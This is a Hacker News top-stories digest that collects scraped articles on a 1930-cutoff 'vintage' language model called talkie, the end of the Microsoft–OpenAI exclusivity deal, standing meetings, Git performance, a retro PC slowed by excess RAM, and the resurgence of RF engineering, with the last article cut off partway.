# Hacker News Top 30 — 2026-04-28

Generated on 2026-04-28 03:27 UTC

## [HN-TITLE] 1. Talkie: a 13B vintage language model from 1930

- **Source**: [https://talkie-lm.com/introducing-talkie](https://talkie-lm.com/introducing-talkie)
- **Site**: talkie-lm.com
- **Author**: Nick Levine, David Duvenaud, Alec Radford
- **Submitted**: 2026-04-27 21:55 UTC (Hacker News)
- **HN activity**: 128 points · [39 comments](https://news.ycombinator.com/item?id=47927903)
- **Length**: 2.4K words (~11 min read)
- **Language**: en

April 2026

This is a 24/7 live feed of Claude Sonnet 4.6 prompting [talkie-1930-13b-it](https://huggingface.co/talkie-lm/talkie-1930-13b-it) in order to explore its knowledge, capabilities, and inclinations. talkie’s outputs reflect the culture and values of the texts it was trained on, not the views of its authors.

## Why vintage language models?

Have you ever daydreamed about talking to someone from the past? What would you ask someone with no knowledge of the modern world? What would they ask *you*? While we don’t have time machines yet, we can simulate this experience by training, in Owain Evans’s phrase, [‘vintage’ language models](https://owainevans.github.io/talk-transcript.html): LMs trained only on historical text.

These models are fascinating conversation partners (watch Claude prompt talkie, our 13B 1930 LM, in the widget above). But we are also excited by the possibility that the careful study of the behaviors and capabilities of vintage LMs will advance our understanding of AI in general.

Figure 1. In an early attempt to understand a vintage model’s anticipation of the future, we took nearly 5,000 historical event descriptions from the *New York Times’s* [“On This Day” feature](https://archive.nytimes.com/learning.blogs.nytimes.com/on-this-day/), calculated their surprisingness (measured as bits per byte of text) to our 13B model trained exclusively on pre-1931 text, and binned by decade.

For example, we can evaluate LMs’ ability to predict the future. Inspired by Calcifer Computing’s work on [Temporal Language Models](https://www.calcifercomputing.com/reports/tlm), we calculated the surprisingness of short descriptions of historical events to a 13B model trained on pre-1931 text (Figure 1). We can see an increase after the knowledge cutoff, particularly pronounced in the 1950s and 1960s, followed by a plateau. We will continue to develop evals to measure with greater confidence how forecasting performance improves with model size and decays at longer horizons. Training larger vintage language models will allow us to uncover these scaling trends.
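The "bits per byte" surprisal in Figure 1 isn't spelled out beyond the caption; a minimal sketch of the usual computation, assuming you already have the model's per-token log-probabilities for the scored text, is:

```python
import math

def bits_per_byte(token_logprobs, text):
    """Surprisal of `text` in bits per UTF-8 byte, given the model's
    per-token log-probabilities (natural log) for that text."""
    total_nats = -sum(token_logprobs)      # total negative log-likelihood
    total_bits = total_nats / math.log(2)  # convert nats to bits
    return total_bits / len(text.encode("utf-8"))
```

Normalizing by bytes rather than tokens keeps scores comparable across models with different tokenizers, which is presumably why the caption measures per byte.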

![Turing’s On Computable Numbers (1936), Carlson’s xerography patent (1942), and Sikorsky’s helicopter patent (1935)](https://talkie-lm.com/images/papers-composite.png)

Figure 2. Patents and a paper published after talkie’s knowledge cutoff. Left to right: helicopter patent (Sikorsky, 1935), Turing machines paper (Turing, 1936), xerography patent (Carlson, 1942).

Similarly, we can test LMs’ abilities to come up with new ideas by seeing if they can arrive at inventions or scientific discoveries we know would arise after their knowledge cutoffs, such as those pictured in Figure 2. As Demis Hassabis has asked, could a model trained up to 1911 independently discover General Relativity, as Einstein did in 1915?

Figure 3. We gave a Python programming test ([HumanEval](https://github.com/openai/human-eval)) to a series of pairs of vintage models (trained on pre-1931 text) and modern models (trained on the web), which have the same architecture. Left: This chart shows what percentage of problems each model would get right at least once, given 100 chances and randomly chosen Python functions as examples to learn from in-context. Right: An example of a successful solution to a Python coding problem produced by a vintage language model. The model had access to several other in-context examples to learn from.

[Contamination](https://arxiv.org/abs/2602.12413) is a persistent problem for language models and causes us to overestimate the capabilities of LMs. Vintage LMs are contamination-free by construction, enabling unique generalization experiments, like examining whether a model with no knowledge of digital computers can learn to code in a modern programming language. Figure 3 (left-hand side) shows an early example of such a test, measuring how well models trained on pre-1931 text can, when given a few demonstration examples of [Python programs](https://github.com/openai/human-eval), write new correct programs. While vintage models dramatically underperform models trained on web data (which includes code), we’ve found that they are slowly but steadily improving at this task with scale.
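The "right at least once, given 100 chances" metric in Figure 3 is conventionally computed with the unbiased pass@k estimator from the linked HumanEval codebase; assuming talkie's evaluation follows that convention, it looks like:

```python
from math import comb

def pass_at_k(n, c, k):
    """Unbiased pass@k estimator (as defined in the HumanEval codebase):
    probability that at least one of k samples passes, given n total
    generations per problem of which c passed the unit tests."""
    if n - c < k:
        return 1.0  # too few failures to fill all k draws: guaranteed success
    return 1.0 - comb(n - c, k) / comb(n, k)
```

With n = k = 100 this reduces to "did any of the 100 samples pass", but the estimator also lets you report pass@k for smaller k without resampling.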

There is still a long way to go before this capability is notable, however. All correct solutions generated by the vintage models are simple one-line programs (such as adding two inputs), or small modifications to in-context example programs. For instance, our model implemented the decoding function of a rotation cipher when [given the encoding function](https://huggingface.co/datasets/openai/openai_humaneval/viewer/openai_humaneval/test?row=50). Although the solution (Figure 3, right-hand side) is only a single character edit (swapping an addition for a subtraction), this success suggests an understanding of inverse functions. We hope LMs with early knowledge cutoffs help the research community understand how well LMs can generalize beyond their pre-training data.
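For reference, the linked benchmark problem pairs a Caesar-style encoder with a decoder to be completed; reconstructed from the public benchmark (so treat details as approximate), the single-character fix described above is exactly the sign flip:

```python
def encode_shift(s):
    # Shift every lowercase letter forward by 5, wrapping around the alphabet.
    return "".join(chr(((ord(ch) + 5 - ord("a")) % 26) + ord("a")) for ch in s)

def decode_shift(s):
    # The inverse: the identical expression with the addition made a subtraction.
    return "".join(chr(((ord(ch) - 5 - ord("a")) % 26) + ord("a")) for ch in s)
```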

Vintage language models could also teach us about the impact of data diversity in AI development. While modern models vary in disposition, capability, and behavior, they are all closely related to one another by having been trained, whether directly or indirectly (via distillation and synthetic data), on the web. How does this shape and constrain what they are? How much of what we think we know about LMs is about human language and culture in general, or about this one dataset—the web—in particular? Training on different sources may lead to very different kinds of models being created. Studying the ways in which they are similar and different could improve our understanding of language model personas, behaviors, and dispositions.

## Introducing talkie

We have been excited to see a proliferation of vintage LM projects, including [Ranke-4B](https://github.com/DGoettlich/history-llms/tree/main), [Mr. Chatterbox](https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/), and [Machina Mirabilis](https://michaelhla.com/blog/machina-mirabilis.html).

Alongside these efforts, we introduce [talkie-1930-13b-base](https://huggingface.co/talkie-lm/talkie-1930-13b-base), a 13B language model trained on 260B tokens of historical pre-1931 English text. Additionally, we present a post-trained [checkpoint](https://huggingface.co/talkie-lm/talkie-1930-13b-it) turning our base model into a conversation partner without relying on modern chat transcripts or instruction-tuning data.

talkie is the largest vintage language model we are aware of, and we plan to continue scaling significantly. As a next step, we are training a GPT-3-level model, which we hope to release this summer. A preliminary estimate also suggests we can grow our corpus to well over a trillion tokens of historical text, which should be sufficient to create a GPT-3.5 level model—similar in capability to the original ChatGPT.

## Benchmarking an LM from 1930

Figure 4. Evaluation accuracy vs. training compute for talkie-1930 (Vintage LM) and its [modern twin trained on FineWeb](https://huggingface.co/talkie-lm/talkie-web-13b-base). The vintage model underperforms the modern model on knowledge evals. Filtering out questions anachronistic from the perspective of 1930 roughly halves the performance gap between the vintage and modern models.

To contextualize talkie’s capabilities, we built a “[modern twin](https://huggingface.co/talkie-lm/talkie-web-13b-base)” that is identical architecturally but trained on modern web data (FineWeb) instead of pre-1931 text. On average, talkie underperforms its modern counterpart in standard LM evaluations, even after correcting for question anachronism, despite being trained with the same number of FLOPs (see Figure 4). But we have been encouraged by its similar performance on core language understanding and numeracy tasks.

We suspect a combination of differences in data quality (poor optical character recognition) and corpus subject matter distribution explains why talkie-1930 underperforms on some benchmarks. To maximize the compute efficiency of future vintage language model training, we are developing a vintage optical character recognition (OCR) system to improve the quality of transcription of historical text.

## Collecting vintage data

Piggybacking off the invaluable work of organizations like the [Institutional Data Initiative](https://huggingface.co/datasets/institutional/institutional-books-1.0) and the [Internet Archive](https://archive.org/about/) and efforts like [Common Pile](https://huggingface.co/common-pile), we have collected hundreds of billions of pre-1931 English-language tokens. These include books, newspapers, periodicals, scientific journals, patents, and case law. We chose the end of 1930 as the cutoff date because that is when works enter the public domain in the United States. For this version of the model, we also limited ourselves to primarily English-language texts, because validating the data pipeline requires deep familiarity with source documents, and we are native English speakers. But multilingual corpus expansion is a high priority, both to increase the size of the corpus and the diversity of perspectives it represents.

## Training vintage language models

Developing vintage language models presents unique challenges. Here, we discuss some of them in brief. We will follow up in greater detail in the coming months as we continue our research.

### Temporal leakage

Who was president of the United States in 1936, and what were the most significant pieces of legislation he signed?

Franklin D. Roosevelt was president of the United States from 1933 to 1937. The most important legislation signed by him was the National Recovery Act of 1933; the Agricultural Adjustment Act of 1935; and the Emergency Banking Act of 1935 (amended in 1936).

Figure 5. talkie-1930-13b’s knowledge of the Roosevelt presidency and New Deal is an example of imperfect filtering of the pre-training corpus.

The most important objective when training vintage language models is that no data leaks into the training corpus from after the intended knowledge cutoff (in our case, December 31st, 1930). There are several ways this can happen, such as including modern documents with faulty date metadata, or old documents with post hoc anachronistic insertions like editorial introductions or footnotes.

For talkie-1930, we developed a document-level n-gram-based anachronism classifier and used it to filter the pre-training corpus. However, this was not perfect. An earlier 7B version of talkie clearly knew about the Roosevelt presidency and New Deal legislation (Figure 5). talkie-1930-13b is additionally aware of some details related to World War II and the immediate postwar order (the United Nations and the division of Germany). For future versions of the model, we are developing new techniques for leakage detection and filtering using more advanced classifiers.
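The article doesn't describe the classifier beyond "document-level n-gram-based"; a deliberately minimal sketch of the idea, with a hypothetical phrase list standing in for whatever talkie actually uses, might look like:

```python
# Hypothetical sketch: flag a document as anachronistic if it contains
# phrases attested only after the 1930 cutoff. The phrase list is
# illustrative, not talkie's actual classifier.
ANACHRONISTIC_NGRAMS = {
    "new deal", "united nations", "world war ii",
    "television network", "nuclear weapon",
}

def ngrams(tokens, n):
    # All contiguous n-token windows of the token list.
    return zip(*(tokens[i:] for i in range(n)))

def is_anachronistic(text, max_n=3):
    tokens = text.lower().split()
    for n in range(1, max_n + 1):
        for gram in ngrams(tokens, n):
            if " ".join(gram) in ANACHRONISTIC_NGRAMS:
                return True
    return False
```

A real filter would need frequency statistics over dated corpora rather than a hand-written list, which is presumably where the "more advanced classifiers" come in.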

### Data quality

Figure 6. OCR errors reduce language model learning efficiency. Left: Training LMs on pre-1931 texts transcribed using conventional OCR systems only shows 30% of the learning efficiency of a model trained on human-transcribed versions of the same texts. Regex cleaning of the OCR’d text recovers some performance. Right: Example of a messy machine transcription of *The Wonderful Wizard of Oz* (Baum, 1899).

Data quality is an important issue for all machine learning experiments. It is a special challenge when training vintage language models. Because there was no digital publishing in 1930, all text in our dataset had to be transcribed from a physical source, which introduces a form of noise not seen in natively digital text. While OCR was an early success story of machine learning and computer vision, the classic OCR systems often used to transcribe historical documents struggle on all but the simplest layouts and cleanest scans. Modern VLM-based systems have higher accuracy, but we have found they are prone to hallucinate modern facts into our corpus, poisoning the exercise.

In controlled experiments, we have found that when training an LM on pre-1931 texts transcribed using conventional OCR systems, for a given amount of compute, they only achieve 30% of the performance of a model trained on human-transcribed versions of the same texts (see Figure 6). Simple regex cleaning brings that number up to 70%—still a large discrepancy. We aim to shrink the remaining gap in performance by retranscribing the talkie corpus using our vintage OCR system.
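The specific regex rules aren't given; purely as an illustration of the kinds of fixes involved (rejoining hyphenated line breaks, stripping junk glyphs, collapsing ragged whitespace):

```python
import re

def clean_ocr(text):
    """Illustrative regex cleanup for OCR'd historical text; not talkie's
    actual pipeline."""
    text = re.sub(r"(\w)-\s*\n\s*(\w)", r"\1\2", text)  # "wonder-\nful" -> "wonderful"
    text = re.sub(r"[|~^]+", " ", text)                 # common OCR junk glyphs
    text = re.sub(r"\s+", " ", text)                    # collapse ragged whitespace
    return text.strip()
```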

### Vintage post-training

![Title pages of books used in vintage post-training: Beadle’s Dime Book of Practical Etiquette, Henley’s Twentieth Century Formulas, How to Behave and How to Amuse, and The New Century Standard Letter-Writer](https://talkie-lm.com/images/posttraining-composite.png)

Figure 7. Examples of historical reference texts with regular structure used for post-training. Left to right: etiquette manual (Beadle, 1859), practical knowledge book (Henley, 1914), parlor guide (Sandison, c. 1895), letter-writing manual (Chambers, 1900).

The lack of ready-made post-training data is another significant challenge. Fine-tuning our base model on off-the-shelf instruction-response pairs would bake in anachronistic knowledge, style, and expectations of what a chat assistant ought to be like. Rather than attempting to filter out these biases, we built a post-training pipeline from scratch.

First, we generated instruction-response pairs from historical texts with regular structure, such as etiquette manuals, letter-writing manuals, cookbooks, dictionaries, encyclopedias, and poetry and fable collections (see Figure 7), and fine-tuned our base model on them using a simple chat format.
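As a toy illustration of this first step (the entry format and chat template here are invented, not talkie's), mining dictionary-style entries into instruction-response pairs could be as simple as:

```python
# Hypothetical sketch of mining instruction-response pairs from a
# regularly structured historical text (dictionary-style entries).
import re

CHAT_TEMPLATE = "User: {prompt}\nAssistant: {response}"

def pairs_from_dictionary(raw):
    pairs = []
    for line in raw.splitlines():
        # Match "Headword. Definition text." style entries.
        m = re.match(r"^([A-Z][A-Za-z\- ]+)\.\s+(.+)$", line.strip())
        if m:
            headword, definition = m.group(1), m.group(2)
            prompt = f"What is the meaning of the word '{headword.lower()}'?"
            pairs.append(CHAT_TEMPLATE.format(prompt=prompt, response=definition))
    return pairs
```

Etiquette manuals, cookbooks, and letter-writing guides would each get their own extraction rules, but the shape of the pipeline is the same.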

Next, to improve instruction-following abilities, we generated synthetic prompts covering different types of tasks, such as summarizing documents, responding to direct information requests, and continuing multi-turn conversations coherently. We then ran online direct preference optimization on rollouts generated from these prompts, using Claude Sonnet 4.6 as a judge. Over the course of training, on a held-out eval set, the judge’s average instruction-following rating of talkie’s responses increased from 2.0 to 3.4 (on a five-point scale).
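One common way to turn judge scores over rollouts into DPO training data is to pair each prompt's best- and worst-rated responses; a hypothetical sketch (the margin threshold and data shapes are assumptions, not talkie's published setup):

```python
def preference_pairs(rollouts, min_margin=1.0):
    """rollouts: {prompt: [(response, judge_score), ...]}.
    For each prompt, pair the best- and worst-rated responses, keeping
    the pair only when the judge clearly preferred one of them."""
    pairs = []
    for prompt, scored in rollouts.items():
        ranked = sorted(scored, key=lambda rs: rs[1], reverse=True)
        (chosen, best), (rejected, worst) = ranked[0], ranked[-1]
        if best - worst >= min_margin:
            pairs.append({"prompt": prompt, "chosen": chosen, "rejected": rejected})
    return pairs
```

In the online variant described above, rollouts are sampled from the current policy, scored, paired, and trained on in a loop rather than collected once up front.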

Finally, we did another round of supervised fine-tuning, this time on rejection-sampled multi-turn synthetic chats between Claude Opus 4.6 and talkie, to smooth out persistent rough edges in its conversational abilities.

While we have tried to post-train talkie free from modern influence, reinforcement learning with AI feedback inevitably shapes talkie’s behavior anachronistically. (The 7B version of talkie emerged from RL speaking in listicles.) As we scale up, we hope to be able to use our vintage base models themselves as judges to enable a fully bootstrapped era-appropriate post-training pipeline.

## Scaling talkie

We plan to scale talkie rapidly in the coming months. This will entail:

- Increasing the size of our English-language corpus, and expanding it beyond English.
- Re-OCR’ing as much pre-1931 text as is feasible using our new OCR system.
- Strengthening the leakage detection pipeline by developing new anachronism classification techniques.
- Expanding and refining the vintage post-training pipeline in collaboration with historians, including by developing methodologies for constructing accurate historical personas.

## Join us

We are excited to collaborate with researchers and institutions to build the next generation of vintage language models. Please [get in touch](mailto:hello@talkie-lm.com).

- Are you a researcher or institution with historical texts? We’d love to discuss how we can help make them accessible to researchers and readers, including by applying our OCR model.
- Are you an individual or institution interested in supporting vintage language model development with funding or compute? We can likely use either, or put you in touch with other teams working in the space.
- Are you an academic in the humanities? We are excited to discuss how vintage language models, and the data and infrastructure used to train them, could be useful for your research.
- Are you an AI researcher? We would love to support and collaborate on research on training and [studying vintage language models](https://github.com/talkie-lm/talkie).
- Are you an artist or writer? We think vintage language models could be fruitful tools to [experiment with](https://github.com/talkie-lm/talkie).

## Content considerations

talkie reflects the culture and values of the texts it was trained on. As such, it can produce outputs that modern users will find offensive.

## Acknowledgements

Thanks to Coefficient Giving and Anthropic for support with funding and compute.

For helpful discussions, we thank Pranav Anand, Benjamin Breen, Catherine Brobston, Collin Burns, Matteo Cargnelutti, Mackenzie Cooley, Brandon Duderstadt, Owain Evans, Chloë Farr, Ryan Greenblatt, Michael Hla, Mark Humphries, Sam Klein, Greg Leppert, Jack Lindsey, Christina Lu, Seoirse Murray, Jake Naviasky, Krishna Patel, Ethan Perez, Puria Radmard, Ludwig Schmidt, Buck Shlegeris, Benjamin Sturgeon, Daniel Tan, Ross Taylor, Cam Tice, Trip Venturella, Merlijn Wajer, and Tao Xu.

## Citation

```
@article{levine2026talkie,
  title={Introducing talkie: a 13B vintage language model from 1930},
  author={Levine, Nick and Duvenaud, David and Radford, Alec},
  year={2026},
  month={April},
  url={https://talkie-lm.com/introducing-talkie}
}
```

---

## [HN-TITLE] 2. Microsoft and OpenAI end their exclusive and revenue-sharing deal

- **Source**: [https://www.bloomberg.com/news/articles/2026-04-27/microsoft-to-stop-sharing-revenue-with-main-ai-partner-openai](https://www.bloomberg.com/news/articles/2026-04-27/microsoft-to-stop-sharing-revenue-with-main-ai-partner-openai)
- **Site**: Bloomberg
- **Author**: Matt Day
- **Published**: 2026-04-27
- **HN activity**: 779 points · [677 comments](https://news.ycombinator.com/item?id=47921248)
- **Length**: 133 words (~1 min read)
- **Language**: en

OpenAI CEO Sam Altman, left, speaks with Microsoft Chief Technology Officer Kevin Scott during the Microsoft Build conference in Seattle in 2024. Photographer: Jason Redmond/AFP/Getty Images

April 27, 2026 at 1:14 PM UTC (updated April 27, 2026 at 2:36 PM UTC)

[Microsoft Corp.](https://www.bloomberg.com/quote/MSFT:US) and OpenAI have agreed to drop the software giant’s exclusive right to sell the startup’s AI models, opening the door for the ChatGPT maker to pursue deals with cloud-computing rivals like [Amazon.com Inc.](https://www.bloomberg.com/quote/AMZN:US)

In exchange for ending that exclusivity — which helped boost Microsoft’s cloud sales in the early years of the AI boom — the world’s largest software maker will no longer pay a revenue share on OpenAI products it resells on its cloud. The two companies announced the revised deal in a joint [statement](https://openai.com/index/next-phase-of-microsoft-partnership/ "The next phase of the Microsoft OpenAI partnership") on Monday.

---

## [HN-TITLE] 3. Integrated by Design

- **Source**: [https://vivianvoss.net/blog/integrated-by-design-launch](https://vivianvoss.net/blog/integrated-by-design-launch)
- **Site**: vivianvoss.net
- **Submitter**: vermaden (Hacker News)
- **Submitted**: 2026-04-27 23:14 UTC (Hacker News)
- **HN activity**: 75 points · [27 comments](https://news.ycombinator.com/item?id=47928554)

> no extractable content

---

## [HN-TITLE] 4. Meetings are forcing functions

- **Source**: [https://www.mooreds.com/wordpress/archives/3734](https://www.mooreds.com/wordpress/archives/3734)
- **Site**: mooreds.com
- **Submitter**: zdw (Hacker News)
- **Submitted**: 2026-04-26 03:12 UTC (Hacker News)
- **HN activity**: 67 points · [28 comments](https://news.ycombinator.com/item?id=47906942)
- **Length**: 274 words (~2 min read)
- **Language**: en-US

A recurring meeting serves as a powerful forcing function for long-running projects.

Many organizations face a common challenge: a complex project that requires effort and perspectives from multiple people, moves through definition and execution phases, and unfolds over weeks, months, or years. But one where the tasks to accomplish the project are not anyone’s full-time job.

Everyone has other obligations, fires to put out, and emails to answer. It’s easy for long-term strategic, high-impact work to sink to the bottom of everyone’s todo list.

One effective solution is to schedule a standing meeting. Whether in person or video, it doesn’t matter. The key to making progress is maintaining an agenda and, critically, opening each meeting by reviewing the to-dos from the previous one. This creates pressure on everyone to make progress. When people know they’ll be asked “what’s the status of X that we talked about last week?” at an upcoming meeting, it is easier, though not easy, to carve out time for that work amid the daily chaos.

This approach works across organizational boundaries too. If you’re a consulting firm, a regular cadence of meetings with your client is especially valuable. You’re motivated to deliver, but people on the client’s team may be less so. A meeting where you consistently show progress while they haven’t made any creates gentle but real accountability.

If you’re managing a large, complex, multi-person effort, consider the standing meeting. As for cadence, weekly, bi-weekly, and monthly have all worked for me in the past. Pick whatever fits the urgency.

Use a meeting as a forcing function to ensure people actually make time to move the project forward.

---

## [HN-TITLE] 5. Ted Nyman – High Performance Git

- **Source**: [https://gitperf.com/](https://gitperf.com/)
- **Site**: gitperf.com
- **Submitter**: gnabgib (Hacker News)
- **Submitted**: 2026-04-28 00:32 UTC (Hacker News)
- **HN activity**: 30 points · [6 comments](https://news.ycombinator.com/item?id=47929035)
- **Length**: 321 words (~2 min read)
- **Language**: en

![Pencil sketch of a sailboat moored near a dock with shoreline buildings in the distance.](https://gitperf.com/index-art.png)

Git looks like a version-control tool. It is also a content-addressed database, a filesystem cache, a graph walker, and a transfer protocol.

This book is about those layers and the performance costs of each one. It starts with objects, refs, the index, and history traversal, then moves outward into packfiles, maintenance, sparse working trees, partial clone, transport, repository scale, diagnosis, configuration, and recovery.

It is written for engineers who need Git to stay fast as repositories, histories, and teams get larger: build and CI engineers, monorepo owners, developer-experience teams, and the people who wind up debugging strange Git behavior when the easy explanations stop working.

* * *

### Section 0 · Introduction

0. [Introduction](https://gitperf.com/chapter-00.html)

### Section I · Foundations

Why Git gets slow, what Git stores, and how refs and the index steer through it.

1. [Why Git Performance Matters](https://gitperf.com/chapter-01.html)
2. [Git's Core Data Model](https://gitperf.com/chapter-02.html)
3. [Refs, HEAD, Reflogs, Index](https://gitperf.com/chapter-03.html)

### Section II · History and Rewrite

How Git walks history and how rewrite commands reshape it without mutating commits.

4. [Revisions and History Traversal](https://gitperf.com/chapter-04.html)
5. [Merge, Rebase, Cherry-Pick, Rewrite](https://gitperf.com/chapter-05.html)

### Section III · Storage and Local Scale

Object storage, index cost, maintenance, and the techniques that shrink local state.

06. [Loose Objects, Packfiles, Delta Compression](https://gitperf.com/chapter-06.html)
07. [The Index as a Performance Structure](https://gitperf.com/chapter-07.html)
08. [Commit-Graph, Bloom Filters, MIDX, Bitmaps](https://gitperf.com/chapter-08.html)
09. [Git GC and Maintenance](https://gitperf.com/chapter-09.html)
10. [Sparse-Checkout and Sparse-Index](https://gitperf.com/chapter-10.html)

### Section IV · Large-Repo Operations, Transport, and Scale

Clone shape, transfer policy, parallel work with worktrees, repository size, and ref scale.

11. [Partial Clone and Promisor Remotes](https://gitperf.com/chapter-11.html)
12. [Scalar, Prefetch, Large Repositories](https://gitperf.com/chapter-12.html)
13. [Worktrees](https://gitperf.com/chapter-13.html)
14. [Clone, Fetch, Push, Protocol v2](https://gitperf.com/chapter-14.html)
15. [Bundles and Bundle URIs](https://gitperf.com/chapter-15.html)
16. [Reducing Repository Size](https://gitperf.com/chapter-16.html)
17. [Large Ref Sets: Files, Packed-Refs, Reftable, and `git refs`](https://gitperf.com/chapter-17.html)

### Section V · Diagnosis and Recovery

How to instrument Git, find the slow layer, apply high-leverage settings, and recover when the repository is actually wrong.

18. [Instrumenting Git](https://gitperf.com/chapter-18.html)
19. [Finding and Fixing Slow Git](https://gitperf.com/chapter-19.html)
20. [Configuration Playbook](https://gitperf.com/chapter-20.html)
21. [Recovery and Repair](https://gitperf.com/chapter-21.html)

### Back Matter

- [Epilogue: Git in the Agent Loop](https://gitperf.com/epilogue.html)
- [Appendix: Compatibility Guidance](https://gitperf.com/appendix-version-requirements.html)
- [Appendix: Approaches to Virtualized Working Trees](https://gitperf.com/appendix-virtualized-working-trees.html)
- [Glossary of Git Terms](https://gitperf.com/glossary.html)

---

## [HN-TITLE] 6. Three men are facing charges in Toronto SMS Blaster arrests

- **Source**: [https://www.tps.ca/media-centre/stories/unprecedented-sms-blaster-arrests/](https://www.tps.ca/media-centre/stories/unprecedented-sms-blaster-arrests/)
- **Site**: tps.ca
- **Submitter**: gnabgib (Hacker News)
- **Submitted**: 2026-04-27 20:44 UTC (Hacker News)
- **HN activity**: 119 points · [52 comments](https://news.ycombinator.com/item?id=47927070)

> scrape failed: http 403

---

## [HN-TITLE] 7. Is my blue your blue?

- **Source**: [https://ismy.blue/](https://ismy.blue/)
- **Site**: ismy.blue
- **Submitter**: theogravity (Hacker News)
- **Submitted**: 2026-04-27 20:24 UTC (Hacker News)
- **HN activity**: 380 points · [256 comments](https://news.ycombinator.com/item?id=47926861)
- **Language**: en

> no extractable content

---

## [HN-TITLE] 8. Mo RAM, Mo Problems (2025)

- **Source**: [https://fabiensanglard.net/curse/](https://fabiensanglard.net/curse/)
- **Site**: fabiensanglard.net
- **Submitter**: blfr (Hacker News)
- **Submitted**: 2026-04-25 15:41 UTC (Hacker News)
- **HN activity**: 25 points · [4 comments](https://news.ycombinator.com/item?id=47902269)
- **Length**: 537 words (~3 min read)

Feb 16, 2025

Mo RAM, mo problems

* * *

As a retro-computer enthusiast, I find that parts are either insanely expensive or dirt cheap. The first case has obvious problems, but the second can lead to issues too.

When I built the [Quake PC](https://fabiensanglard.net/quake_pc), the motherboard and HDD were worth their weight in gold. But the price of RAM modules was ridiculously low. So I maxed out the board, buying 384 MiB of SDRAM, worth $40,000 at 1997 prices, for $60.

From 44 fps to 33 fps

* * *

After I got the machine working, I ran benchmarks for weeks. I was constantly swapping video cards, changing RAM types (SDRAM, EDO), adding RAM, removing RAM, and testing different CPUs. The CPU in my collection that ran Quake the best was the Pentium MMX 233MHz, clocking demo1 at **44.6 fps**. That figure was consistent with benchmarks of the era.

I wrote an [article about winquake](https://fabiensanglard.net/winquake) then took a break from 1997. A month later I had the idea to measure Michael Abrash’s assembly optimizations. I ran the same benchmark again. But this time I measured **33 fps**. That was nearly 25% slower. What happened?

Troubleshooting

* * *

I tried pretty much everything I could think of. I swapped the graphics card, removed all the 3D accelerators, updated the drivers, downgraded the drivers, wiped the whole system, re-installed everything, double-checked that I was still using the MMX 233MHz, and verified the frequency multiplier. Still **33 fps**.

Did a RAM module go bad? I tried removing one of them. **33 fps**. I removed a second one (leaving only one). Now the game ran at **44 fps**. Two modules going bad? Hm, that seemed weird. I tried swapping modules, leaving only one in the machine at a time. All of them ran the game at **44 fps**. Only when two or more were in the machine did the framerate drop back to **33 fps**.

Epiphany

* * *

I vaguely remembered something about having too much RAM from the excellent *Upgrading and Repairing PCs 10th edition*.

> That last issue is one that many people are not aware of. The 430FX chipset can only cache up to 64M of main memory. This means that if you install more than 64M of RAM in your system, performance will suffer greatly.
> 
> Now, many think this won’t be that much of a problem—after all, they don't normally run enough software to load past the first 64M anyway. That is another misunderstanding, because Windows 95 and NT load from the top down.
> 
> This means, for example, that if you install 96M of RAM (one 64M and one 32M bank), then virtually all of your software, including the main operating system, will be loading into the non-cached region above 64M. Only if you use more than 32M would you begin to see an improvement in performance.
> 
> - Upgrading and Repairing PCs 10th edition

My motherboard, an XA100, is from 1998 and advertised as supporting caching of 512 MiB, but there is clearly something amiss there. It seems it can actually only cache in the neighborhood of 128 MiB, which means any amount over that made everything run without an L2 cache!

And that is the story of how I made that PC faster, by removing RAM.


---

## [HN-TITLE] 9. The quiet resurgence of RF engineering

- **Source**: [https://atempleton.bearblog.dev/quiet-resurgence-of-rf-engineering/](https://atempleton.bearblog.dev/quiet-resurgence-of-rf-engineering/)
- **Site**: Anthony T's Blog
- **Submitter**: merlinq (Hacker News)
- **Submitted**: 2026-04-25 18:25 UTC (Hacker News)
- **HN activity**: 153 points · [84 comments](https://news.ycombinator.com/item?id=47903439)
- **Length**: 1.8K words (~9 min read)
- **Language**: en

*14 Apr, 2026*

I've worked in the aerospace industry for the past 8 years, and for most of that time I could confidently say that RF engineering was a quiet, non-evolving field. The advice I heard early on, and that I watched a lot of other people follow, was to go into software. Machine learning, cloud infrastructure, web development. That's where the growth was, that's where the money was, and honestly, that's where most new graduates went (myself included at the time). I studied Information Systems in college, not electrical engineering. RF was nowhere on my radar.

But aerospace has a way of pulling you into hardware whether you planned on it or not. I started my career at NASA, building telemetry platforms, ETL pipelines, and spacecraft visualization tools. Pure software work. Then I moved to a private aerospace company. It was much smaller than NASA (approx. 130 employees when I joined), and working on its ground systems required me to wear a ton of hats. That's where things shifted. When you're responsible for ground station services, even when most of it now is *software defined*, you can't stay in the software lane entirely. I found myself doing link budget analysis, troubleshooting RF anomalies, and developing a working understanding of the RF hardware chain that I never expected to need.

That experience is part of why I've been paying attention to what's happening in RF more broadly. I've been feeling a shift over the past several years — more demand, fewer people, and more urgency from the companies I talk to. RF engineering is not only alive, it's rebounding in a significant way. I wanted to dig into whether my gut feeling here is actually backed by data, or if I'm just seeing what I want to see from inside the aerospace bubble.

## What Actually Happened to RF

To be fair to the people who called RF a shrinking field, they weren't wrong, at least for a stretch. After the dot-com bust in the early 2000s, the telecom industry consolidated hard. Companies merged, manufacturing moved offshore, and a lot of RF design work either disappeared or got absorbed into a handful of large defense contractors. The broader electrical engineering job market stagnated. [Electronic Design](https://www.electronicdesign.com/technologies/embedded/article/21255051/electronic-design-electronics-and-electrical-engineering-jobs-on-the-declinecan-they-be-saved) has documented this trend not just for RF, but across EE as a whole. I feel confident that if the field as a whole was shrinking, the RF subfield was declining with it.

And then software exploded. The engineers who might've gone into EE or RF design a generation earlier went down the software "FAANG" route instead. University enrollment in RF-specific coursework drifted down. Though I'll be honest, hard numbers on this are annoyingly hard to find, so this is more of a gut assumption. What we do know is that today, companies [openly describe the difficulty](https://filtronic.com/blogs_challenges-of-recruiting-rf-engineers/) of recruiting RF engineers, pointing to a generation that chose software over EE.

But here's the thing that gets missed in the narrative: it never actually went away. The defense sector has been keeping it alive this entire time. Raytheon, Lockheed Martin, Northrop Grumman, these companies never stopped hiring people who understand beam patterns, power amplifiers, and antenna design. The majority of RF engineering job postings have historically come from aerospace and defense. RF didn't die. It just receded from the civilian sector while quietly remaining essential to national security and defense.

## So What Changed

The resurgence didn't come from one place. It's coming from several industries all hitting the same wall at roughly the same time: a shortage of engineers who can work at the hardware level.

### The Space Boom

